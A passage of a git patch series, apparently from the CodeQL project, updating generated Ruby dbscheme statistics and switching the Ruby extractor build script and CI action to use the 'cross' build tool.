2 - 1558 - 1559 + 1624 + 1625 2 @@ -15158,8 +15310,8 @@ 12 - 1 - 2 + 2 + 3 2 @@ -15173,18 +15325,18 @@ 2 - 62 - 63 + 59 + 60 2 - 594 - 595 + 611 + 612 2 - 1558 - 1559 + 1624 + 1625 2 @@ -15201,7 +15353,7 @@ 1 2 - 6502 + 6125 @@ -15217,7 +15369,7 @@ 1 2 - 6502 + 6125 @@ -15233,7 +15385,7 @@ 1 2 - 6502 + 6125 @@ -15243,19 +15395,19 @@ ruby_optional_parameter_def - 6540 + 6579 id - 6540 + 6579 name - 6540 + 6579 value - 6540 + 6579 @@ -15269,7 +15421,7 @@ 1 2 - 6540 + 6579 @@ -15285,7 +15437,7 @@ 1 2 - 6540 + 6579 @@ -15301,7 +15453,7 @@ 1 2 - 6540 + 6579 @@ -15317,7 +15469,7 @@ 1 2 - 6540 + 6579 @@ -15333,7 +15485,7 @@ 1 2 - 6540 + 6579 @@ -15349,7 +15501,7 @@ 1 2 - 6540 + 6579 @@ -15359,15 +15511,15 @@ ruby_pair_def - 237637 + 242198 id - 237637 + 242198 key__ - 237637 + 242198 @@ -15381,7 +15533,7 @@ 1 2 - 237637 + 242198 @@ -15397,7 +15549,7 @@ 1 2 - 237637 + 242198 @@ -15407,15 +15559,15 @@ ruby_pair_value - 237637 + 242198 ruby_pair - 237637 + 242198 value - 237637 + 242198 @@ -15429,7 +15581,7 @@ 1 2 - 237637 + 242198 @@ -15445,7 +15597,7 @@ 1 2 - 237637 + 242198 @@ -15497,11 +15649,11 @@ ruby_parenthesized_statements_child - 10537 + 10764 ruby_parenthesized_statements - 10471 + 10690 index @@ -15509,7 +15661,7 @@ child - 10537 + 10764 @@ -15523,12 +15675,12 @@ 1 2 - 10413 + 10626 2 5 - 58 + 64 @@ -15544,12 +15696,12 @@ 1 2 - 10413 + 10626 2 5 - 58 + 64 @@ -15568,18 +15720,18 @@ 1 - 7 - 8 + 9 + 10 1 - 58 - 59 + 64 + 65 1 - 10471 - 10472 + 10690 + 10691 1 @@ -15599,18 +15751,18 @@ 1 - 7 - 8 + 9 + 10 1 - 58 - 59 + 64 + 65 1 - 10471 - 10472 + 10690 + 10691 1 @@ -15627,7 +15779,7 @@ 1 2 - 10537 + 10764 @@ -15643,7 +15795,7 @@ 1 2 - 10537 + 10764 @@ -15653,26 +15805,26 @@ ruby_parenthesized_statements_def - 10510 + 10729 id - 10510 + 10729 ruby_pattern_def - 3918 + 3935 id - 3918 + 3935 child - 3918 + 3935 @@ -15686,7 +15838,7 @@ 1 2 - 3918 + 3935 @@ -15702,7 +15854,7 @@ 1 2 - 3918 + 3935 @@ -15712,19 +15864,19 @@ ruby_program_child - 33068 + 33372 ruby_program - 10393 + 10508 index - 235 + 234 child - 33068 + 33372 @@ -15738,32 +15890,32 @@ 1 2 - 3809 + 3876 2 3 - 2513 + 2511 3 4 - 1661 + 1708 4 5 - 796 + 787 5 8 - 895 + 901 8 77 - 716 + 722 @@ -15779,32 +15931,32 @@ 1 2 - 3809 + 3876 2 3 - 2513 + 2511 3 4 - 1661 + 1708 4 5 - 796 + 787 5 8 - 895 + 901 8 77 - 716 + 722 @@ -15820,52 +15972,57 @@ 1 2 - 52 + 43 2 3 - 40 + 37 - 4 - 10 + 3 + 8 18 - 11 - 16 + 8 + 12 18 - 16 - 23 + 12 + 17 18 - 26 - 37 + 17 + 29 18 - 39 - 64 + 29 + 43 18 - 68 - 141 + 43 + 79 18 - 159 - 521 + 87 + 187 18 - 777 - 3354 - 12 + 234 + 1335 + 18 + + + 2147 + 3403 + 6 @@ -15881,52 +16038,57 @@ 1 2 - 52 + 43 2 3 - 40 + 37 - 4 - 10 + 3 + 8 18 - 11 - 16 + 8 + 12 18 - 16 - 23 + 12 + 17 18 - 26 - 37 + 17 + 29 18 - 39 - 64 + 29 + 43 18 - 68 - 141 + 43 + 79 18 - 159 - 521 + 87 + 187 18 - 777 - 3354 - 12 + 234 + 1335 + 18 + + + 2147 + 3403 + 6 @@ -15942,7 +16104,7 @@ 1 2 - 33068 + 33372 @@ -15958,7 +16120,7 @@ 1 2 - 33068 + 33372 @@ -15968,26 +16130,26 @@ ruby_program_def - 17193 + 17468 id - 17193 + 17468 ruby_range_begin - 4174 + 4315 ruby_range - 4174 + 4315 begin - 4174 + 4315 @@ -16001,7 +16163,7 @@ 1 2 - 4174 + 4315 @@ -16017,7 +16179,7 @@ 1 2 - 4174 + 4315 @@ -16027,11 +16189,11 @@ ruby_range_def - 4435 + 4582 id - 4435 + 4582 operator @@ -16049,7 +16211,7 @@ 1 2 - 4435 + 4582 @@ -16063,13 +16225,13 @@ 12 - 1459 - 1460 + 1535 + 1536 1 - 2976 - 2977 + 3047 + 3048 1 @@ -16080,15 +16242,15 @@ ruby_range_end - 4268 + 4411 ruby_range - 4268 + 4411 end - 4268 + 4411 @@ -16102,7 +16264,7 @@ 1 2 - 4268 + 4411 @@ -16118,7 +16280,7 @@ 1 2 - 4268 + 4411 @@ -16128,15 +16290,15 @@ ruby_rational_def - 124 + 131 id - 124 + 131 child - 124 + 131 @@ -16150,7 +16312,7 @@ 1 2 - 124 + 131 @@ -16166,7 +16328,7 @@ 1 2 - 124 + 131 @@ -16224,22 +16386,22 @@ ruby_redo_def - 33 + 34 id - 33 + 34 ruby_regex_child - 43722 + 44014 ruby_regex - 13081 + 13134 index @@ -16247,7 +16409,7 @@ child - 43722 + 44014 @@ -16261,42 +16423,42 @@ 1 2 - 6732 + 6696 2 3 - 712 + 741 3 4 - 1745 + 1776 4 5 - 492 + 491 5 6 - 1094 + 1112 6 8 - 1016 + 1028 8 15 - 995 + 994 15 50 - 291 + 293 @@ -16312,42 +16474,42 @@ 1 2 - 6732 + 6696 2 3 - 712 + 741 3 4 - 1745 + 1776 4 5 - 492 + 491 5 6 - 1094 + 1112 6 8 - 1016 + 1028 8 15 - 995 + 994 15 50 - 291 + 293 @@ -16406,23 +16568,23 @@ 12 - 94 - 165 + 95 + 166 12 - 229 - 416 + 230 + 418 12 - 658 - 1256 + 663 + 1270 12 - 1818 - 4221 + 1844 + 4253 9 @@ -16482,23 +16644,23 @@ 12 - 94 - 165 + 95 + 166 12 - 229 - 416 + 230 + 418 12 - 658 - 1256 + 663 + 1270 12 - 1818 - 4221 + 1844 + 4253 9 @@ -16515,7 +16677,7 @@ 1 2 - 43722 + 44014 @@ -16531,7 +16693,7 @@ 1 2 - 43722 + 44014 @@ -16541,26 +16703,26 @@ ruby_regex_def - 13096 + 13149 id - 13096 + 13149 ruby_rescue_body - 1762 + 2145 ruby_rescue - 1762 + 2145 body - 1762 + 2145 @@ -16574,7 +16736,7 @@ 1 2 - 1762 + 2145 @@ -16590,7 +16752,7 @@ 1 2 - 1762 + 2145 @@ -16600,26 +16762,26 @@ ruby_rescue_def - 2085 + 2410 id - 2085 + 2410 ruby_rescue_exceptions - 1654 + 1986 ruby_rescue - 1654 + 1986 exceptions - 1654 + 1986 @@ -16633,7 +16795,7 @@ 1 2 - 1654 + 1986 @@ -16649,7 +16811,7 @@ 1 2 - 1654 + 1986 @@ -16659,19 +16821,19 @@ ruby_rescue_modifier_def - 519 + 450 id - 519 + 450 body - 519 + 450 handler - 519 + 450 @@ -16685,7 +16847,7 @@ 1 2 - 519 + 450 @@ -16701,7 +16863,7 @@ 1 2 - 519 + 450 @@ -16717,7 +16879,7 @@ 1 2 - 519 + 450 @@ -16733,7 +16895,7 @@ 1 2 - 519 + 450 @@ -16749,7 +16911,7 @@ 1 2 - 519 + 450 @@ -16765,7 +16927,7 @@ 1 2 - 519 + 450 @@ -16775,15 +16937,15 @@ ruby_rescue_variable - 991 + 938 ruby_rescue - 991 + 938 variable - 991 + 938 @@ -16797,7 +16959,7 @@ 1 2 - 991 + 938 @@ -16813,7 +16975,7 @@ 1 2 - 991 + 938 @@ -16823,15 +16985,15 @@ ruby_rest_assignment_child - 381 + 382 ruby_rest_assignment - 381 + 382 child - 381 + 382 @@ -16845,7 +17007,7 @@ 1 2 - 381 + 382 @@ -16861,7 +17023,7 @@ 1 2 - 381 + 382 @@ -16871,11 +17033,11 @@ ruby_rest_assignment_def - 399 + 400 id - 399 + 400 @@ -16941,15 +17103,15 @@ ruby_return_child - 5330 + 5139 ruby_return - 5330 + 5139 child - 5330 + 5139 @@ -16963,7 +17125,7 @@ 1 2 - 5330 + 5139 @@ -16979,7 +17141,7 @@ 1 2 - 5330 + 5139 @@ -16989,22 +17151,22 @@ ruby_return_def - 8486 + 8257 id - 8486 + 8257 ruby_right_assignment_list_child - 2721 + 2625 ruby_right_assignment_list - 1274 + 1235 index @@ -17012,7 +17174,7 @@ child - 2721 + 2625 @@ -17026,17 +17188,17 @@ 2 3 - 1134 + 1105 3 4 - 111 + 108 4 6 - 27 + 21 @@ -17052,17 +17214,17 @@ 2 3 - 1134 + 1105 3 4 - 111 + 108 4 6 - 27 + 21 @@ -17076,23 +17238,23 @@ 12 - 2 - 3 + 1 + 2 3 - 9 - 10 + 7 + 8 3 - 45 - 46 + 42 + 43 3 - 411 - 412 + 400 + 401 6 @@ -17107,23 +17269,23 @@ 12 - 2 - 3 + 1 + 2 3 - 9 - 10 + 7 + 8 3 - 45 - 46 + 42 + 43 3 - 411 - 412 + 400 + 401 6 @@ -17140,7 +17302,7 @@ 1 2 - 2721 + 2625 @@ -17156,7 +17318,7 @@ 1 2 - 2721 + 2625 @@ -17166,26 +17328,26 @@ ruby_right_assignment_list_def - 1274 + 1235 id - 1274 + 1235 ruby_scope_resolution_def - 81024 + 82269 id - 81024 + 82269 name - 81024 + 82269 @@ -17199,7 +17361,7 @@ 1 2 - 81024 + 82269 @@ -17215,7 +17377,7 @@ 1 2 - 81024 + 82269 @@ -17225,15 +17387,15 @@ ruby_scope_resolution_scope - 79203 + 80425 ruby_scope_resolution - 79203 + 80425 scope - 79203 + 80425 @@ -17247,7 +17409,7 @@ 1 2 - 79203 + 80425 @@ -17263,7 +17425,7 @@ 1 2 - 79203 + 80425 @@ -17273,15 +17435,15 @@ ruby_setter_def - 601 + 630 id - 601 + 630 name - 601 + 630 @@ -17295,7 +17457,7 @@ 1 2 - 601 + 630 @@ -17311,7 +17473,7 @@ 1 2 - 601 + 630 @@ -17321,15 +17483,15 @@ ruby_singleton_class_body - 635 + 642 ruby_singleton_class - 635 + 642 body - 635 + 642 @@ -17343,7 +17505,7 @@ 1 2 - 635 + 642 @@ -17359,7 +17521,7 @@ 1 2 - 635 + 642 @@ -17369,15 +17531,15 @@ ruby_singleton_class_def - 635 + 642 id - 635 + 642 value - 635 + 642 @@ -17391,7 +17553,7 @@ 1 2 - 635 + 642 @@ -17407,7 +17569,7 @@ 1 2 - 635 + 642 @@ -17417,15 +17579,15 @@ ruby_singleton_method_body - 6677 + 6523 ruby_singleton_method - 6677 + 6523 body - 6677 + 6523 @@ -17439,7 +17601,7 @@ 1 2 - 6677 + 6523 @@ -17455,7 +17617,7 @@ 1 2 - 6677 + 6523 @@ -17465,19 +17627,19 @@ ruby_singleton_method_def - 6692 + 6536 id - 6692 + 6536 name - 6692 + 6536 object - 6692 + 6536 @@ -17491,7 +17653,7 @@ 1 2 - 6692 + 6536 @@ -17507,7 +17669,7 @@ 1 2 - 6692 + 6536 @@ -17523,7 +17685,7 @@ 1 2 - 6692 + 6536 @@ -17539,7 +17701,7 @@ 1 2 - 6692 + 6536 @@ -17555,7 +17717,7 @@ 1 2 - 6692 + 6536 @@ -17571,7 +17733,7 @@ 1 2 - 6692 + 6536 @@ -17581,15 +17743,15 @@ ruby_singleton_method_parameters - 4183 + 4102 ruby_singleton_method - 4183 + 4102 parameters - 4183 + 4102 @@ -17603,7 +17765,7 @@ 1 2 - 4183 + 4102 @@ -17619,7 +17781,55 @@ 1 2 - 4183 + 4102 + + + + + + + + + ruby_splat_argument_child + 3130 + + + ruby_splat_argument + 3130 + + + child + 3130 + + + + + ruby_splat_argument + child + + + 12 + + + 1 + 2 + 3130 + + + + + + + child + ruby_splat_argument + + + 12 + + + 1 + 2 + 3130 @@ -17629,74 +17839,37 @@ ruby_splat_argument_def - 3093 + 3130 id - 3093 - - - child - 3093 + 3130 - - - id - child - - - 12 - - - 1 - 2 - 3093 - - - - - - - child - id - - - 12 - - - 1 - 2 - 3093 - - - - - - + ruby_splat_parameter_def - 2978 + 3042 id - 2978 + 3042 ruby_splat_parameter_name - 2383 + 2418 ruby_splat_parameter - 2383 + 2418 name - 2383 + 2418 @@ -17710,7 +17883,7 @@ 1 2 - 2383 + 2418 @@ -17726,7 +17899,7 @@ 1 2 - 2383 + 2418 @@ -17736,11 +17909,11 @@ ruby_string_array_child - 11622 + 11962 ruby_string_array - 3773 + 3880 index @@ -17748,7 +17921,7 @@ child - 11622 + 11962 @@ -17762,27 +17935,27 @@ 1 2 - 1222 + 1250 2 3 - 1256 + 1278 3 4 - 581 + 611 4 5 - 296 + 302 5 10 - 284 + 305 10 @@ -17803,27 +17976,27 @@ 1 2 - 1222 + 1250 2 3 - 1256 + 1278 3 4 - 581 + 611 4 5 - 296 + 302 5 10 - 284 + 305 10 @@ -17849,17 +18022,17 @@ 2 15 - 36 - - - 17 - 419 35 - 714 - 3774 - 4 + 15 + 305 + 35 + + + 439 + 3881 + 5 @@ -17880,17 +18053,17 @@ 2 15 - 36 - - - 17 - 419 35 - 714 - 3774 - 4 + 15 + 305 + 35 + + + 439 + 3881 + 5 @@ -17906,7 +18079,7 @@ 1 2 - 11622 + 11962 @@ -17922,7 +18095,7 @@ 1 2 - 11622 + 11962 @@ -17932,22 +18105,22 @@ ruby_string_array_def - 3913 + 4022 id - 3913 + 4022 ruby_string_child - 538306 + 544996 ruby_string__ - 469399 + 474439 index @@ -17955,7 +18128,7 @@ child - 538306 + 544996 @@ -17969,12 +18142,12 @@ 1 2 - 442362 + 446747 2 282 - 27037 + 27692 @@ -17990,12 +18163,12 @@ 1 2 - 442362 + 446747 2 282 - 27037 + 27692 @@ -18034,8 +18207,8 @@ 22 - 102 - 469400 + 104 + 474440 22 @@ -18075,8 +18248,8 @@ 22 - 102 - 469400 + 104 + 474440 22 @@ -18093,7 +18266,7 @@ 1 2 - 538306 + 544996 @@ -18109,7 +18282,7 @@ 1 2 - 538306 + 544996 @@ -18119,30 +18292,30 @@ ruby_string_def - 476418 + 481711 id - 476418 + 481711 ruby_subshell_child - 604 + 602 ruby_subshell - 393 + 404 index - 34 + 33 child - 604 + 602 @@ -18156,7 +18329,7 @@ 1 2 - 288 + 302 2 @@ -18165,13 +18338,13 @@ 3 - 4 - 21 + 5 + 33 - 4 + 5 12 - 24 + 9 @@ -18187,7 +18360,7 @@ 1 2 - 288 + 302 2 @@ -18196,13 +18369,13 @@ 3 - 4 - 21 + 5 + 33 - 4 + 5 12 - 24 + 9 @@ -18231,23 +18404,23 @@ 3 - 8 - 9 + 6 + 7 3 - 15 - 16 + 14 + 15 3 - 34 - 35 + 33 + 34 3 - 127 - 128 + 131 + 132 3 @@ -18277,23 +18450,23 @@ 3 - 8 - 9 + 6 + 7 3 - 15 - 16 + 14 + 15 3 - 34 - 35 + 33 + 34 3 - 127 - 128 + 131 + 132 3 @@ -18310,7 +18483,7 @@ 1 2 - 604 + 602 @@ -18326,7 +18499,7 @@ 1 2 - 604 + 602 @@ -18336,26 +18509,26 @@ ruby_subshell_def - 393 + 404 id - 393 + 404 ruby_superclass_def - 13378 + 13470 id - 13378 + 13470 child - 13378 + 13470 @@ -18369,7 +18542,7 @@ 1 2 - 13378 + 13470 @@ -18385,7 +18558,7 @@ 1 2 - 13378 + 13470 @@ -18395,19 +18568,19 @@ ruby_symbol_array_child - 2085 + 8244 ruby_symbol_array - 460 + 2256 index - 96 + 251 child - 2085 + 8244 @@ -18421,42 +18594,32 @@ 1 2 - 180 + 172 2 3 - 93 + 1243 3 4 - 40 + 360 4 6 - 26 + 204 6 - 8 - 35 + 11 + 169 - 8 - 13 - 37 - - - 13 - 22 - 37 - - - 27 - 34 - 8 + 11 + 96 + 106 @@ -18472,42 +18635,32 @@ 1 2 - 180 + 172 2 3 - 93 + 1243 3 4 - 40 + 360 4 6 - 26 + 204 6 - 8 - 35 + 11 + 169 - 8 - 13 - 37 - - - 13 - 22 - 37 - - - 27 - 34 - 8 + 11 + 96 + 106 @@ -18523,52 +18676,37 @@ 1 2 - 8 + 18 2 3 - 8 + 145 - 3 - 4 - 17 + 4 + 9 + 21 - 5 - 7 - 8 + 9 + 20 + 21 - 7 - 11 - 8 + 23 + 47 + 21 - 13 - 17 - 8 + 55 + 787 + 21 - 18 - 24 - 8 - - - 26 - 34 - 8 - - - 41 - 51 - 8 - - - 64 - 159 - 8 + 851 + 852 + 2 @@ -18584,52 +18722,37 @@ 1 2 - 8 + 18 2 3 - 8 + 145 - 3 - 4 - 17 + 4 + 9 + 21 - 5 - 7 - 8 + 9 + 20 + 21 - 7 - 11 - 8 + 23 + 47 + 21 - 13 - 17 - 8 + 55 + 787 + 21 - 18 - 24 - 8 - - - 26 - 34 - 8 - - - 41 - 51 - 8 - - - 64 - 159 - 8 + 851 + 852 + 2 @@ -18645,7 +18768,7 @@ 1 2 - 2085 + 8244 @@ -18661,7 +18784,7 @@ 1 2 - 2085 + 8244 @@ -18671,30 +18794,30 @@ ruby_symbol_array_def - 460 + 2256 id - 460 + 2256 ruby_then_child - 40747 + 38335 ruby_then - 24194 + 22782 index - 105 + 95 child - 40747 + 38335 @@ -18708,22 +18831,22 @@ 1 2 - 15103 + 14200 2 3 - 5505 + 5202 3 4 - 1954 + 1850 4 37 - 1630 + 1527 @@ -18739,22 +18862,22 @@ 1 2 - 15103 + 14200 2 3 - 5505 + 5202 3 4 - 1954 + 1850 4 37 - 1630 + 1527 @@ -18770,47 +18893,47 @@ 1 2 - 35 + 31 2 4 - 8 + 7 4 5 - 14 + 10 - 6 + 5 + 7 + 5 + + + 8 10 - 8 + 7 10 - 20 - 8 + 30 + 7 - 30 - 59 - 8 + 41 + 94 + 7 - 91 - 293 - 8 + 157 + 577 + 7 - 559 - 3117 - 8 - - - 8293 - 8294 - 2 + 1274 + 8592 + 7 @@ -18826,47 +18949,47 @@ 1 2 - 35 + 31 2 4 - 8 + 7 4 5 - 14 + 10 - 6 + 5 + 7 + 5 + + + 8 10 - 8 + 7 10 - 20 - 8 + 30 + 7 - 30 - 59 - 8 + 41 + 94 + 7 - 91 - 293 - 8 + 157 + 577 + 7 - 559 - 3117 - 8 - - - 8293 - 8294 - 2 + 1274 + 8592 + 7 @@ -18882,7 +19005,7 @@ 1 2 - 40747 + 38335 @@ -18898,7 +19021,7 @@ 1 2 - 40747 + 38335 @@ -18908,30 +19031,30 @@ ruby_then_def - 24194 + 22782 id - 24194 + 22782 ruby_tokeninfo - 5993849 + 6095002 id - 5993849 + 6095002 kind - 64 + 58 value - 272090 + 269571 @@ -18945,7 +19068,7 @@ 1 2 - 5993849 + 6095002 @@ -18961,7 +19084,7 @@ 1 2 - 5993849 + 6095002 @@ -18975,65 +19098,65 @@ 12 - 38 - 162 + 39 + 166 5 - 229 - 427 + 242 + 428 5 - 1651 - 1652 + 1810 + 1811 2 - 1892 - 1893 + 2051 + 2052 5 - 4175 - 4176 + 4502 + 4727 + 5 + + + 4892 + 6531 + 5 + + + 9012 + 9349 + 5 + + + 14534 + 19466 + 5 + + + 27671 + 60322 + 5 + + + 64587 + 91496 + 5 + + + 111315 + 574645 + 5 + + + 1288567 + 1288568 2 - - 4361 - 4362 - 5 - - - 5941 - 8156 - 5 - - - 9961 - 13707 - 5 - - - 17937 - 25691 - 5 - - - 55821 - 57168 - 5 - - - 82456 - 97584 - 5 - - - 513548 - 1147355 - 5 - @@ -19048,51 +19171,51 @@ 1 2 - 14 + 13 5 - 24 + 26 5 - 25 - 32 + 28 + 37 5 - 71 + 72 122 5 - 124 - 148 + 130 + 159 5 - 1483 - 1800 + 1494 + 1907 5 - 3157 - 3799 + 3468 + 4173 5 - 4735 - 7872 + 5033 + 8171 5 - 10529 - 19137 + 11374 + 20743 5 - 45798 - 45799 + 51094 + 51095 2 @@ -19109,32 +19232,32 @@ 1 2 - 162126 + 160540 2 3 - 39738 + 39361 3 4 - 18995 + 18992 4 7 - 22513 + 22487 7 - 27 - 20459 + 28 + 20270 - 27 - 189123 - 8256 + 28 + 210511 + 7918 @@ -19150,12 +19273,12 @@ 1 2 - 259066 + 256182 2 5 - 13023 + 13389 @@ -19165,15 +19288,15 @@ ruby_unary_def - 13450 + 13513 id - 13450 + 13513 operand - 13450 + 13513 operator @@ -19191,7 +19314,7 @@ 1 2 - 13450 + 13513 @@ -19207,7 +19330,7 @@ 1 2 - 13450 + 13513 @@ -19223,7 +19346,7 @@ 1 2 - 13450 + 13513 @@ -19239,7 +19362,7 @@ 1 2 - 13450 + 13513 @@ -19258,28 +19381,28 @@ 1 - 190 - 191 + 189 + 190 1 - 559 - 560 + 571 + 572 1 - 1320 - 1321 + 1334 + 1335 1 - 1820 - 1821 + 1897 + 1898 1 - 9472 - 9473 + 9433 + 9434 1 @@ -19299,28 +19422,28 @@ 1 - 190 - 191 + 189 + 190 1 - 559 - 560 + 571 + 572 1 - 1320 - 1321 + 1334 + 1335 1 - 1820 - 1821 + 1897 + 1898 1 - 9472 - 9473 + 9433 + 9434 1 @@ -19526,15 +19649,15 @@ ruby_unless_consequence - 2593 + 2624 ruby_unless - 2593 + 2624 consequence - 2593 + 2624 @@ -19548,7 +19671,7 @@ 1 2 - 2593 + 2624 @@ -19564,7 +19687,7 @@ 1 2 - 2593 + 2624 @@ -19574,15 +19697,15 @@ ruby_unless_def - 2594 + 2625 id - 2594 + 2625 condition - 2594 + 2625 @@ -19596,7 +19719,7 @@ 1 2 - 2594 + 2625 @@ -19612,7 +19735,7 @@ 1 2 - 2594 + 2625 @@ -19622,15 +19745,15 @@ ruby_unless_guard_def - 0 + 1 id - 0 + 1 condition - 0 + 1 @@ -19644,7 +19767,7 @@ 1 2 - 2 + 1 @@ -19656,7 +19779,13 @@ 12 - + + + 1 + 2 + 1 + + @@ -19664,19 +19793,19 @@ ruby_unless_modifier_def - 4163 + 3688 id - 4163 + 3688 body - 4163 + 3688 condition - 4163 + 3688 @@ -19690,7 +19819,7 @@ 1 2 - 4163 + 3688 @@ -19706,7 +19835,7 @@ 1 2 - 4163 + 3688 @@ -19722,7 +19851,7 @@ 1 2 - 4163 + 3688 @@ -19738,7 +19867,7 @@ 1 2 - 4163 + 3688 @@ -19754,7 +19883,7 @@ 1 2 - 4163 + 3688 @@ -19770,7 +19899,7 @@ 1 2 - 4163 + 3688 @@ -19780,19 +19909,19 @@ ruby_until_def - 121 + 123 id - 121 + 123 body - 121 + 123 condition - 121 + 123 @@ -19806,7 +19935,7 @@ 1 2 - 121 + 123 @@ -19822,7 +19951,7 @@ 1 2 - 121 + 123 @@ -19838,7 +19967,7 @@ 1 2 - 121 + 123 @@ -19854,7 +19983,7 @@ 1 2 - 121 + 123 @@ -19870,7 +19999,7 @@ 1 2 - 121 + 123 @@ -19886,7 +20015,7 @@ 1 2 - 121 + 123 @@ -19896,19 +20025,19 @@ ruby_until_modifier_def - 223 + 226 id - 223 + 226 body - 223 + 226 condition - 223 + 226 @@ -19922,7 +20051,7 @@ 1 2 - 223 + 226 @@ -19938,7 +20067,7 @@ 1 2 - 223 + 226 @@ -19954,7 +20083,7 @@ 1 2 - 223 + 226 @@ -19970,7 +20099,7 @@ 1 2 - 223 + 226 @@ -19986,7 +20115,7 @@ 1 2 - 223 + 226 @@ -20002,7 +20131,7 @@ 1 2 - 223 + 226 @@ -20054,15 +20183,15 @@ ruby_when_body - 3211 + 3255 ruby_when - 3211 + 3255 body - 3211 + 3255 @@ -20076,7 +20205,7 @@ 1 2 - 3211 + 3255 @@ -20092,7 +20221,7 @@ 1 2 - 3211 + 3255 @@ -20102,22 +20231,22 @@ ruby_when_def - 3248 + 3289 id - 3248 + 3289 ruby_when_pattern - 3918 + 3935 ruby_when - 3248 + 3289 index @@ -20125,7 +20254,7 @@ pattern - 3918 + 3935 @@ -20139,17 +20268,17 @@ 1 2 - 2830 + 2881 2 3 - 309 + 302 3 15 - 108 + 105 @@ -20165,17 +20294,17 @@ 1 2 - 2830 + 2881 2 3 - 309 + 302 3 15 - 108 + 105 @@ -20198,34 +20327,34 @@ 4 12 + + 5 + 6 + 3 + 6 7 3 - 7 - 8 + 12 + 13 3 - 13 - 14 + 34 + 35 3 - 35 - 36 + 132 + 133 3 - 135 - 136 - 3 - - - 1048 - 1049 + 1065 + 1066 3 @@ -20249,34 +20378,34 @@ 4 12 + + 5 + 6 + 3 + 6 7 3 - 7 - 8 + 12 + 13 3 - 13 - 14 + 34 + 35 3 - 35 - 36 + 132 + 133 3 - 135 - 136 - 3 - - - 1048 - 1049 + 1065 + 1066 3 @@ -20293,7 +20422,7 @@ 1 2 - 3918 + 3935 @@ -20309,7 +20438,7 @@ 1 2 - 3918 + 3935 @@ -20319,19 +20448,19 @@ ruby_while_def - 1349 + 1375 id - 1349 + 1375 body - 1349 + 1375 condition - 1349 + 1375 @@ -20345,7 +20474,7 @@ 1 2 - 1349 + 1375 @@ -20361,7 +20490,7 @@ 1 2 - 1349 + 1375 @@ -20377,7 +20506,7 @@ 1 2 - 1349 + 1375 @@ -20393,7 +20522,7 @@ 1 2 - 1349 + 1375 @@ -20409,7 +20538,7 @@ 1 2 - 1349 + 1375 @@ -20425,7 +20554,7 @@ 1 2 - 1349 + 1375 @@ -20435,19 +20564,19 @@ ruby_while_modifier_def - 190 + 193 id - 190 + 193 body - 190 + 193 condition - 190 + 193 @@ -20461,7 +20590,7 @@ 1 2 - 190 + 193 @@ -20477,7 +20606,7 @@ 1 2 - 190 + 193 @@ -20493,7 +20622,7 @@ 1 2 - 190 + 193 @@ -20509,7 +20638,7 @@ 1 2 - 190 + 193 @@ -20525,7 +20654,7 @@ 1 2 - 190 + 193 @@ -20541,7 +20670,7 @@ 1 2 - 190 + 193 @@ -20551,15 +20680,15 @@ ruby_yield_child - 1097 + 1121 ruby_yield - 1097 + 1121 child - 1097 + 1121 @@ -20573,7 +20702,7 @@ 1 2 - 1097 + 1121 @@ -20589,7 +20718,7 @@ 1 2 - 1097 + 1121 @@ -20599,11 +20728,11 @@ ruby_yield_def - 2389 + 2452 id - 2389 + 2452 From 5865b51a9451110a8b198067b7eedc4e512d1058 Mon Sep 17 00:00:00 2001 From: Arthur Baars Date: Wed, 11 Jan 2023 17:17:20 +0100 Subject: [PATCH 270/381] Ruby: build extractor using cross --- ruby/actions/create-extractor-pack/action.yml | 8 +++++--- ruby/scripts/create-extractor-pack.sh | 9 ++++++--- 2 files changed, 11 insertions(+), 6 deletions(-) diff --git a/ruby/actions/create-extractor-pack/action.yml b/ruby/actions/create-extractor-pack/action.yml index 7062dd0cfcd..59aad56ced7 100644 --- a/ruby/actions/create-extractor-pack/action.yml +++ b/ruby/actions/create-extractor-pack/action.yml @@ -10,7 +10,7 @@ runs: uses: actions/cache@v3 with: path: ruby/extractor-pack - key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-extractor-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/**/Cargo.lock') }}-${{ hashFiles('ruby/**/*.rs') }}-${{ hashFiles('ruby/codeql-extractor.yml', 'ruby/downgrades', 'ruby/tools', 'ruby/ql/lib/ruby.dbscheme', 'ruby/ql/lib/ruby.dbscheme.stats') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-extractor-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/scripts/create-extractor-pack.sh', 'ruby/**/Cargo.lock', 'ruby/actions/create-extractor-pack/action.yml') }}-${{ hashFiles('ruby/**/*.rs') }}-${{ hashFiles('ruby/codeql-extractor.yml', 'ruby/downgrades', 'ruby/tools', 'ruby/ql/lib/ruby.dbscheme', 'ruby/ql/lib/ruby.dbscheme.stats') }} - name: Cache cargo uses: actions/cache@v3 if: steps.cache-extractor.outputs.cache-hit != 'true' @@ -19,9 +19,11 @@ runs: ~/.cargo/registry ~/.cargo/git ruby/target - key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-ruby-qltest-cargo-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/**/Cargo.lock') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-ruby-qltest-cargo-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/scripts/create-extractor-pack.sh', 'ruby/**/Cargo.lock') }} - name: Build Extractor if: steps.cache-extractor.outputs.cache-hit != 'true' shell: bash - run: scripts/create-extractor-pack.sh + run: | + cargo install cross --version 0.2.1 + scripts/create-extractor-pack.sh working-directory: ruby diff --git a/ruby/scripts/create-extractor-pack.sh b/ruby/scripts/create-extractor-pack.sh index 4b5fcbcc638..c5f5192994c 100755 --- a/ruby/scripts/create-extractor-pack.sh +++ b/ruby/scripts/create-extractor-pack.sh @@ -1,8 +1,11 @@ #!/bin/bash set -eux - +CARGO=cargo if [[ "$OSTYPE" == "linux-gnu"* ]]; then platform="linux64" + if which cross; then + CARGO=cross + fi elif [[ "$OSTYPE" == "darwin"* ]]; then platform="osx64" else @@ -10,9 +13,9 @@ else exit 1 fi -cargo build --release +"$CARGO" build --release -cargo run --release -p ruby-generator -- --dbscheme ql/lib/ruby.dbscheme --library ql/lib/codeql/ruby/ast/internal/TreeSitter.qll +"$CARGO" run --release -p ruby-generator -- --dbscheme ql/lib/ruby.dbscheme --library ql/lib/codeql/ruby/ast/internal/TreeSitter.qll codeql query format -i ql/lib/codeql/ruby/ast/internal/TreeSitter.qll rm -rf extractor-pack From dd8bead21ad397147827998696db3028a1f682a8 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 13 Jan 2023 10:57:44 +0000 Subject: [PATCH 271/381] 